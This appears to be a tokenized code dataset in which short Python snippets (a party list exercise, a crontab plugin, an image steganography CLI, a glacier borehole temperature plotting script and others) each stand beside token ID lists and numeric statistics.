# Task 02. Party
person = input()
party = Party()
while not person == "End":
party.people.append(person)
person = input()
print(f"Going: {', '.join(party.people)}")
print(f"Total: {len(party.people)}")
| [
2,
15941,
7816,
13,
3615,
628,
198,
6259,
796,
5128,
3419,
198,
10608,
796,
3615,
3419,
198,
198,
4514,
407,
1048,
6624,
366,
12915,
1298,
198,
220,
220,
220,
2151,
13,
15332,
13,
33295,
7,
6259,
8,
198,
220,
220,
220,
1048,
796,
... | 2.721519 | 79 |
# Your TwoSum object will be instantiated and called as such:
# obj = TwoSum()
# obj.add(number)
# param_2 = obj.find(value)
| [
220,
220,
220,
220,
220,
220,
220,
220,
628,
198,
2,
3406,
4930,
13065,
2134,
481,
307,
9113,
12931,
290,
1444,
355,
884,
25,
198,
2,
26181,
796,
4930,
13065,
3419,
198,
2,
26181,
13,
2860,
7,
17618,
8,
198,
2,
5772,
62,
17,
796... | 2.615385 | 52 |
import requests
import os
from pathlib import Path
import settings
| [
11748,
7007,
198,
11748,
28686,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
11748,
6460,
628
] | 4.3125 | 16 |
"""
Crystal Well Headless execution.
Should not be called directly but via headless_execution.py.
"""
import os
import sys
from blvcw.crystal_well_components import CrystalWellSettings, CrystalWellLoader
from blvcw.crystal_well_simulation import CrystalWellSimulator
class __CrystalWellHeadlessExecution:
"""
Performs headless execution with a provided settings file.
The following steps are performed:
1. CrystalWellSettings is loaded with the settings file
2. CrystalWellLoader is generated and imports the crystal object if a custom file is provided
3. CrystalWellSimulator is called with the classes created before and renders like in the add-on
"""
argv = sys.argv
if "--settings_file" not in argv:
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
settings_file = argv[argv.index("--settings_file") + 1]
if settings_file == "":
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
elif not os.path.exists(settings_file): # Path not found
print("ERROR: SETTINGS FILE NOT FOUND")
exit(1)
crystal_well_headless = __CrystalWellHeadlessExecution(settings_file_path=settings_file)
crystal_well_headless.perform_headless_execution()
exit(0)
| [
37811,
198,
43752,
3894,
7123,
1203,
9706,
13,
198,
19926,
407,
307,
1444,
3264,
475,
2884,
1182,
1203,
62,
18558,
1009,
13,
9078,
13,
198,
37811,
198,
198,
11748,
28686,
198,
11748,
25064,
198,
6738,
698,
28435,
86,
13,
20470,
7757,
... | 3.155263 | 380 |
# Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from sparseml.onnx.base import (
check_onnx_install,
check_onnxruntime_install,
onnx,
onnx_err,
onnxruntime,
onnxruntime_err,
require_onnx,
require_onnxruntime,
)
| [
2,
15069,
357,
66,
8,
33448,
532,
1944,
1220,
47986,
32707,
11,
3457,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,... | 3.131579 | 266 |
import re
| [
11748,
302,
628,
198
] | 3 | 4 |
import logging
from device.models import Device
from device import connection
from device.connection.gci import GCI
from defs import DeviceRequest
LOGGER = logging.getLogger(__name__)
"""
This module provides functions for sending requests to a device.
"""
def capability(device: Device):
"""
Sends a capability request to the target device.
:param device: device to send the capability request to
"""
content = f"^{DeviceRequest.CAPABILITY}$".encode("utf-8")
connection.send(GCI.Message(content), device)
| [
11748,
18931,
198,
198,
6738,
3335,
13,
27530,
1330,
16232,
198,
6738,
3335,
1330,
4637,
198,
6738,
3335,
13,
38659,
13,
70,
979,
1330,
20145,
40,
198,
6738,
825,
82,
1330,
16232,
18453,
198,
198,
25294,
30373,
796,
18931,
13,
1136,
1... | 3.43949 | 157 |
"""
Module to handle an user crontab file.
"""
import os
import pwd
from jadi import component
from aj.api.http import url, HttpPlugin
from aj.api.endpoint import endpoint, EndpointError
from .manager import CronManager
from reconfigure.items.crontab import CrontabNormalTaskData, CrontabSpecialTaskData, CrontabEnvSettingData
@component(HttpPlugin) | [
37811,
198,
26796,
284,
5412,
281,
2836,
1067,
756,
397,
2393,
13,
198,
37811,
198,
198,
11748,
28686,
198,
11748,
279,
16993,
198,
6738,
474,
9189,
1330,
7515,
198,
198,
6738,
257,
73,
13,
15042,
13,
4023,
1330,
19016,
11,
367,
29281... | 3.352381 | 105 |
#!/usr/bin/env python
from optparse import OptionParser
from PIL import Image
if __name__ == "__main__":
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser(usage=usage)
parser.add_option("-c", "--carrier", dest="carrier",
help="The filename of the image used as the carrier.",
metavar="FILE")
parser.add_option("-m", "--message", dest="message",
help="The filename of the image that will be hidden.",
metavar="FILE")
parser.add_option("-o", "--output", dest="output",
help="The filename the hidden image will be extracted to.",
metavar="FILE")
parser.add_option("-e", "--extract",
action="store_true", dest="extract", default=False,
help="Extract hidden image from carrier and save to output filename.")
(options, args) = parser.parse_args()
if options.extract == True:
if options.carrier is None or options.output is None:
parser.error("a carrier filename -c and output file -o are required for extraction")
else:
ExtractMessage(options.carrier, options.output)
else:
if options.carrier is None or options.message is None or options.output is None:
parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
else:
HideMessage(options.carrier, options.message, options.output)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
201,
198,
6738,
2172,
29572,
1330,
16018,
46677,
201,
198,
6738,
350,
4146,
1330,
7412,
201,
198,
220,
220,
220,
220,
201,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
201,... | 2.411024 | 635 |
#script to plot results from 1_full_process.py
#science advances figure guidelines. Preferably 2.5, 5.0, or 7.3 inches wide
#and no more than 11.0 inches high. Miminum line width of 0.5 pt. 9 pt and
#bold for e.g. A, B, C, etc.
#Robert Law, Scott Polar Research Institute, University of Cambridge, 2020. rl491@cam.ac.uk
import os
import sys
import glob
import scipy
import pylab
import seaborn
import datetime
import matplotlib
import numpy as np
import xarray as xr
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.patches as patch
import matplotlib.ticker as mticker
from matplotlib.ticker import MultipleLocator
Polynomial = np.polynomial.Polynomial
os.chdir(os.path.dirname(sys.argv[0]))
from T0_curve_fitting import fit_model, plot_model
#define functions
#inputs
file_path_end = 'processed_data/ch1_end_processed.nc'
file_path_full = 'processed_data/ch1_full_processed.nc'
plot_date = datetime.datetime(2019, 8, 14, 0, 0, 0) #date for plotting in datetime format
av_date = datetime.datetime(2019, 8, 10, 0, 0, 0) #date for averaging where in use. Takes average from av_date to plot_date
bh_depth = 1042.95 #(m) from Sam Doyle BH19c depth email thread
bh_depth_dts = 1062. #(m) BH19c depth from DTS with refractive index error
z_start = 204. #(m) z value where cable first enters ice (in non corrected distance)
fs = 8
close_up_depth = 970 #(m) depth for basal close up to begin from
CTZ_lower = 982 #(m) interpreted depth of bottom of the CTZ
max_T = 1 #(deg C) maximum temperature for image plot
min_T = -22 #(deg C) minimum temperature for image plot
pmp_allow = 0.0 #(K) how far to allow pmp away from calculated value to include in temperate zone #WHERE TO DEFINE THIS AS? 0.075 FOR FIGURE, BUT LOWER VALUE WORKS BETTER FOR ANLYSIS.
equib_cut = 35 #(ind) depth cut to remove top section where cooling is not clearly exponential
fail_depth = (1109.5 - z_start)*(bh_depth/bh_depth_dts) #(m) at which point did the cable fail?
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#constants (i.e. things that definitely won't change unless some seriously strange shit happens)
T0 = 273.15 #(K) 0 degrees C in Kelvin
Ttr = 273.16 #(K) triple point temperature of water
ptr = 611.73 #(Pa) triple point pressure of water
g = 9.81 #(m/s^2) gravitational acceleration
Bs = 1.86 #(K kg mol^-1) constant for pmp calculations from Cuffey and Paterson following Lliboutry (1976)
#parameters (i.e. things that could change)
ccc = 9.14e-8 #(K/Pa) Clausius-Clapeyron constant
ccc2 = 9.14e-8 #(K/Pa) for water and solute load analysis. This value keeps the pmp line away from from the obvserved at all points
slope = 0.96 #(degrees) slope under borehole
rho_ice = 910. #(kg/m^3) ice density
#load datasets
ds_end = xr.open_dataset(file_path_end)
ds_full = xr.open_dataset(file_path_full)
#ds_end.tmpw.isel(t = -1).plot(linewidth = 0.7)
#plt.show()
print(ds_end)
print(ds_full)
sys.exit()
#correct depth
ds_end.z.values = (ds_end.z.values - z_start)*(bh_depth/bh_depth_dts)
ds_full.z.values = (ds_full.z.values - z_start)*(bh_depth/bh_depth_dts)
#extract useful part
#ds_end = ds_end.isel(t = -1)
#load data from Sam Doyle
Doyle_df = pd.read_csv('Doyle_data/analog_blue.csv')
Doyle_dt_val = Doyle_df.loc[:,'datetime'].values #datetime values
Doyle_dt_list = list(Doyle_dt_val) #datetime list
Doyle_dts = [datetime.datetime.strptime(x, r'%d/%m/%Y %H:%M') for x in Doyle_dt_list]
Doyle_dt_np = np.array(Doyle_dts) #into np array
#get plotting index
ind_date_Doyle = np.argmax(Doyle_dt_np > plot_date)
av_ind_date_Doyle = np.argmax(Doyle_dt_np > av_date)
#get T values from Doyle_df
T1 = Doyle_df.loc[ind_date_Doyle,"T1"]
T2 = Doyle_df.loc[ind_date_Doyle,"T2"]
T3 = Doyle_df.loc[ind_date_Doyle,"T3"]
T4 = Doyle_df.loc[ind_date_Doyle,"T4"]
T5 = Doyle_df.loc[ind_date_Doyle,"T5"]
T_doyle = np.array([T1, T2, T3, T4, T5])
#means
av_T1 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
av_T2 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
av_T3 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
av_T4 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
av_T5 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
av_T_doyle = np.array([av_T1, av_T2, av_T3, av_T4, av_T5])
#stds
std_T1 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
std_T2 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
std_T3 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
std_T4 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
std_T5 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
std_T_doyle = np.array([std_T1, std_T2, std_T3, std_T4, std_T5])
#manualy input thermistor depths (T1:T5)
T_depths = np.array([0.28, 1, 3, 5.04, 10.05])
T_depths = bh_depth - T_depths
#set scatter coords
x_scat = T_doyle
y_scat = T_depths
#Clausius-Clapeyron calculation
p_ice = rho_ice*g*ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start))*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
T_pmp_cc_w_sol = Ttr - ccc2*(p_ice - ptr) #for water and solute load analysis
#obtain indicies
depth_ind = np.argmax(ds_end.z.values > bh_depth)
#start_ind = np.argmax(ds_end.z.values > z_start) - 1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 1. Time series image plot with close ups for solute load and water content
#image plot
y = ds_full.z.values
T = ds_full.tmpw.sel(z = slice(0+z_start, bh_depth+z_start)).values
close_up_ind = np.argmax(y > close_up_depth)
temp_min = -0.85
temp_max = -0.75
#create image of temperate zone
pmp_cut = T_pmp_cc
pmp_cut_w_sol = T_pmp_cc_w_sol
pmp_im = np.zeros(np.shape(T)) #pmp image
pmp_im_w_sol = np.zeros(np.shape(T)) #pmp image for water and solute analysis
pmp_ind = np.zeros(pmp_im.shape[1])
for i in range(pmp_im.shape[1]):
pmp_im[:,i] = pmp_cut
pmp_im_w_sol[:,i] = pmp_cut_w_sol
pmp_im_w_sol = pmp_im_w_sol - T0 #w_sol means for water and solute analysis
pmp_im = pmp_im - pmp_allow - T0
#find where temperate zone is exceeded
pmp_dif = T - pmp_im
pmp_dif_w_sol = pmp_im_w_sol - T
pmp_ind = np.greater(pmp_dif, np.zeros(np.shape(T)))
matplotlib.rcParams.update({'font.size': fs})
x_lims = mdates.date2num(ds_full.t.values)
fig1 = plt.figure(figsize = (7.3,130/25.4), constrained_layout=True)
gs = fig1.add_gridspec(10,20)
ax1a = fig1.add_subplot(gs[:6,:-1]) #main image
ax1b = fig1.add_subplot(gs[:6,-1]) #T colorbar
ax1c = fig1.add_subplot(gs[6:8,:-1]) #close up temperate zone T
ax1d = fig1.add_subplot(gs[6:8,-1]) #T colorbar for close up
ax1e = fig1.add_subplot(gs[8:10,:-1]) #water content
ax1f = fig1.add_subplot(gs[8:10,-1]) #water content colourbar
#main image
ax1a.imshow(T, vmin=min_T, vmax=max_T, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
ax1a.hlines(close_up_depth, x_lims[0], x_lims[-1], colors = 'r', lw=0.75, linestyles='dashed')
#print(T)
#ax1a.contour(T, levels = [-25, -20, -15, -10, -5, 0])
#ax1a.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'white', lw=0.8, linestyles='dashed')
#ax1a.contour( pmp_ind, levels=[0], colors='white', linewidths=0.75, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1a_contours = ax1a.contour( T, levels=[-25, -20, -15, -10, -5, 0], colors='white', linewidths=0.75, aspect='auto',
extent = [x_lims[0], x_lims[-1], 0, bh_depth])
#ax1a.clabel(ax1a_contours, fontsize = fs)
#ax1a.set_ylim([bh_depth, 0])
#ax1a.xaxis.set_tick_params(rotation=30)
ax1a.xaxis_date()
ax1a.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1a.set_ylabel(' ', fontsize= fs)
days = mdates.DayLocator()
ax1a.xaxis.set_minor_locator(days)
ax1a.set_xticklabels([])
#create T colorbar as seperate plot
cbar_plot1 = np.zeros((1000, 2))
cbar_plot1[:,0] = np.linspace(max_T, min_T, 1000)
cbar_plot1[:,1] = np.linspace(max_T, min_T, 1000)
im2 = ax1b.imshow( cbar_plot1, aspect='auto', cmap='viridis',
extent = [0, 1, min_T, max_T])
ax1b.set_xticks([])
ax1b.set_yticks(np.arange(min_T, max_T, 1), minor=True)
ax1b.yaxis.set_label_position("right")
ax1b.yaxis.tick_right()
ax1b.tick_params(axis='y', which='minor')
#ax1b.set_ylabel('Temperature ($^\circ$ C)')
#temp close up
ax1c.imshow(T, vmin=temp_min, vmax=temp_max, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1c.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1c.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1c.set_ylim([bh_depth, close_up_depth])
#ax1a.xaxis.set_tick_params(rotation=30)
ax1c.xaxis_date()
ax1c.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
days = mdates.DayLocator()
ax1c.xaxis.set_minor_locator(days)
ax1c.set_xticklabels([])
#create T colorbar as seperate plot
cbar_plot2 = np.zeros((1000, 2))
cbar_plot2[:,0] = np.linspace(temp_max, temp_min, 1000)
cbar_plot2[:,1] = np.linspace(temp_max, temp_min, 1000)
im3 = ax1d.imshow( cbar_plot2, aspect='auto', cmap='viridis',
extent = [0, 1, temp_min, temp_max])
ax1d.set_xticks([])
ax1d.set_yticks(np.arange(temp_min, temp_max, 0.025), minor=True)
ax1d.yaxis.set_label_position("right")
ax1d.yaxis.tick_right()
ax1d.tick_params(axis='y', which='minor')
#ax1d.set_ylabel(' ', fontsize= fs)
#^^^^^^^^^^^^^^^^^^^^^^^^^^
#temperature deviation (n)
n_min = -0.03 #minimum salt concentration for plotting
n_max = 0.03 #maximum salt concentration for plotting
n = pmp_dif_w_sol
ax1e.imshow(n, vmin=n_min, vmax=n_max, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1e.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1e.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1e.set_ylim([bh_depth, close_up_depth])
#ax11a.xaxis.set_tick_params(rotation=30)
ax1e.xaxis_date()
ax1e.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1e.set_xlabel('Date (2019)', fontsize= fs)
days = mdates.DayLocator()
ax1e.xaxis.set_minor_locator(days)
#create salt concentration colorbar as seperate plot
cbar_plot4 = np.zeros((1000, 2))
cbar_plot4[:,0] = np.linspace(n_max, n_min, 1000)
cbar_plot4[:,1] = np.linspace(n_max, n_min, 1000)
im3 = ax1f.imshow(cbar_plot4, aspect='auto', cmap='viridis',
extent = [0, 1, n_min, n_max])
ax1f.set_xticks([])
#ax1f.set_yticks(np.arange(n_min, n_max, 1), minor=True)
ax1f.yaxis.set_label_position("right")
ax1f.yaxis.tick_right()
ax1f.tick_params(axis='y', which='minor')
f = mticker.ScalarFormatter(useOffset=False, useMathText=True)
#format = lambda x,pos : "${}$".format(f._formatSciNotation('%1.10e' % x))
#ax1f.yaxis.set_major_formatter(mticker.FuncFormatter(format))
#ax1f.set_ylabel('Salt concentration (mol/kg)', fontsize= fs)
ax1f.set_ylabel('\n ')
#^^^^^^^^^^^^^^^^^^^^
#text labels
fig1.text(0.01, 0.5, 'Depth (m)', va='center', rotation='vertical', fontsize = fs)
fig1.text(0.96, 0.40, 'Temperature ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1 = fig1.text(0.96, 0.135, 'Temperature\ndeviation ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1.set_multialignment('center')
#text2 = fig1.text(0.96, 0.15, 'Solute\nconcentration', va='center', rotation='vertical', fontsize = fs)
#text2.set_multialignment('center')
#fig1.savefig('figures/T_series.png', dpi=600, bbox_inches = 'tight', pad_inches = 0)
plt.show()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 5. 3 part profile plot (full, gradient, temperate zone close up) with rectangle cut outs
#EQUILIBRIUM ANALYSIS: FULL LOOP
#get time in seconds
t = ds_full.t.values
xdata = [float((t[i] - t[0])*(1e-9)) for i in range(len(t))]
xdata = np.array(xdata)
xdata = xdata - xdata[0] + 1 #add a second on to prevent 0 value
T_equib = T
#create empty arrays
ice_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
ice_T_0[:] = np.nan
RMSE_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
RMSE_T_0[:] = np.nan
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#for loop for each depth
#for i in range(T_equib.shape[0]):
print('Running equilibrium loop..')
#y_equib = ds_full.z.isel(z = slice(equib_cut, 3766))
for i in range(equib_cut, 8300):
#analyse
ydata = T_equib[i,:]
#obtain gradient
ydata_grad = np.gradient(ydata)
grad_max = np.argmin(ydata_grad[equib_start:equib_end])
#calculate index from where to begin x and y data
exp_ind = grad_max + grad_max_pos - equib_start
#set x and y data for the loop
xdata_loop = xdata[exp_ind:]
ydata_loop = ydata[exp_ind:]
#run fitting model
popt, pcov = scipy.optimize.curve_fit(func, xdata_loop, ydata_loop, p0=(0,0,0))
#record temperature
ice_T_0[i] = popt[2]
#obtain residuals
Q = popt[0]
s = popt[1]
residuals = (ydata_loop - func(xdata_loop, Q, s, ice_T_0[i]))
RMSE_T_0[i] = np.sqrt(np.mean(residuals**2))
#plot values
y = ds_end.z.values
y_equib = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values
co_T1 = -17.9
co_T2 = -17.0
co_d1 = 200
co_d2 = 240
a = 0.5
#Clausius-Clapeyron calculation (seperate to figure 1 as easier to keep coords seperate)
p_ice = rho_ice*g*y*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
fig5, (ax5a, ax5b, ax5c) = plt.subplots(1,3)
fig5.set_size_inches(7.3,140/25.4)
fig5.subplots_adjust(wspace = 0.23)
T_mean_grad = np.gradient(ds_end.tmpw, ds_end.z)
ax5b.scatter(-0.0815, 105, color='orange')
ax5b.plot(T_mean_grad, y, lw = 0.25, label = 'Temperature gradient', color='k')
ax5b.invert_yaxis()
ax5b.set_xlim([-0.3, 0.3])
ax5b.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5b.set_xlabel("Temperature gradient ($^\circ$C m$^-1$)")
ax5b.locator_params(axis='x', nbins=6)
ax5b.grid(True)
ax5b.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#ax5b.set_yticklabels([])
ax5a.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=0.8, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5a.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5a.scatter(x_scat, y_scat, s=20, facecolors='none', edgecolors='black', zorder=6, label='Thermistor data')
ax5a.invert_yaxis()
ax5a.set_xlim([-25, 2])
ax5a.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5a.set_xlabel("Temperature ($^\circ$C)")
ax5a.set_ylabel("Depth (m)")
ax5a.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5a.grid(True)
rect1 = patch.Rectangle((co_T1, co_d2), co_T2 - co_T1, co_d1 - co_d2, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect1)
rect2 = patch.Rectangle((-6, 880), 6.5, bh_depth - 880, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect2)
ax5c.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5c.plot(ds_end.tmpw, y, lw=1, label='Temperature', zorder=3, color='k')
ax5c.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5c.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5c.invert_yaxis()
ax5c.set_xlim([-6, -0.5]) #orig = [-25, 2], temp zone = [-1.5, -0.5]quit()
ax5c.set_ylim([bh_depth, 880]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5c.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5c.set_xlabel("Temperature ($^\circ$C)")
ax5c.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5c.grid(True)
#rect3 = patch.Rectangle((-0.95, bh_depth - 85), 0.3, bh_depth - 85, linewidth=1, facecolor='none', edgecolor = 'k')
#ax5c.add_patch(rect3)
#cut out
xspacing = 0.1
yspacing = 5
minorlocatorx = MultipleLocator(xspacing)
majorlocatory = MultipleLocator(yspacing)
ax5d = fig5.add_axes([0.225, 0.46, 0.1, 0.21])
ax5d.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=a, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5d.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5d.invert_yaxis()
ax5d.set_xlim([co_T1, co_T2])
ax5d.set_ylim([co_d2,co_d1]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5d.xaxis.set_minor_locator(minorlocatorx)
#ax5d.yaxis.set_minor_locator(majorlocatory)
ax5d.grid(which='major')
ax5d.grid(which='minor')
ax5e = fig5.add_axes([0.73, 0.15, 0.1, 0.43])
ax5e.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5e.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5e.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5e.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5e.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5e.invert_yaxis()
ax5e.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5e.set_xlim([-0.95, -0.65])
ax5e.set_ylim([bh_depth, bh_depth - 85]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5e.xaxis.set_minor_locator(minorlocatorx)
ax5e.yaxis.set_minor_locator(majorlocatory)
ax5e.grid(which='major')
ax5e.grid(which='minor')
#fig5.savefig('figures/T_profile_mean4.png', dpi=600, bbox_inches = 'tight', format = 'png')
plt.show()
#plt.close('all')
#save outdatacd
data_out = np.column_stack((y, ds_end.tmpw))
#np.savetxt('results/T_profile.txt', data_out)
#clausius clapeyron calculation for each time step
sys.exit()
y_2 = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values #introducing second y cut to region of interest
#for loop to run over area within temperate zone and calculate clausius clapeyron slope and goodness of fit
#create output array
rms_out = np.zeros(len(t)) #store root mean square error
r2_out = np.zeros(len(t)) #r squared value
cc_out = np.zeros(len(t)) #store Clausius Clapeyron
#get index where passes inferred CTZ
t_zone_top = [ n for n,i in enumerate(y_2) if i>982 ][0]
for i in range(len(t)):
#prepare regression inputs
#t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
#print(t_zone_top)
T_full = np.squeeze(T[:,i])
t_zone_ind = np.squeeze(pmp_ind[:,i])
T_t_zone = T_full[t_zone_top:]
y_t_zone = y_2[t_zone_top:]
#perform regression
#m = slope, A0 = intercept
ymin, ymax = min(y_t_zone), max(y_t_zone)
pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
domain=(ymin, ymax))
#print('Raw fit results:', pfit, stats, sep='\n')
A0, m = pfit
resid, rank, sing_val, rcond = stats
rms = np.sqrt(resid[0]/len(y_t_zone))
#perform R2 regressoin
slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(y_t_zone, T_t_zone)
#print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
# '(rms residual = {:.4f})'.format(rms))
#pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
#pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
#pylab.xlabel('Temperature $^{o}C$')
#pylab.ylabel('Depth (m)')
#plt.gca().invert_yaxis()
#pylab.show()
#save outputs
rms_out[i] = rms
r2_out[i] = r_value**2
cc_out[i] = m #convert from K m-1 to K MPa-1
plt.plot(t, -0.8 - 1043*cc_out)
plt.show()
plt.plot(t, (-cc_out/(rho_ice*g))*1e6)
#plt.plot(t, (rms_out/(rho_ice*g))*1e6)
plt.show()
plt.plot(t, r2_out)
plt.show()
#seperate plots
#t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
#print(t_zone_top)
T_full = np.squeeze(T[:,120])
t_zone_ind = np.squeeze(pmp_ind[:,120])
T_t_zone = T_full[t_zone_top:]
y_t_zone = y_2[t_zone_top:]
#perform regression
#m = slope, A0 = intercept
ymin, ymax = min(y_t_zone), max(y_t_zone)
pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
domain=(ymin, ymax))
#print('Raw fit results:', pfit, stats, sep='\n')
A0, m = pfit
resid, rank, sing_val, rcond = stats
rms = np.sqrt(resid[0]/len(y_t_zone))
print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
'(rms residual = {:.4f})'.format(rms))
pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
pylab.xlabel('Temperature $^{o}C$')
pylab.ylabel('Depth (m)')
plt.gca().invert_yaxis()
pylab.show()
| [
2,
12048,
284,
7110,
2482,
422,
352,
62,
12853,
62,
14681,
13,
9078,
198,
2,
16801,
14901,
3785,
9949,
13,
3771,
2232,
1346,
362,
13,
20,
11,
642,
13,
15,
11,
393,
767,
13,
18,
8331,
3094,
198,
2,
392,
645,
517,
621,
1367,
13,
... | 2.168323 | 10,064 |
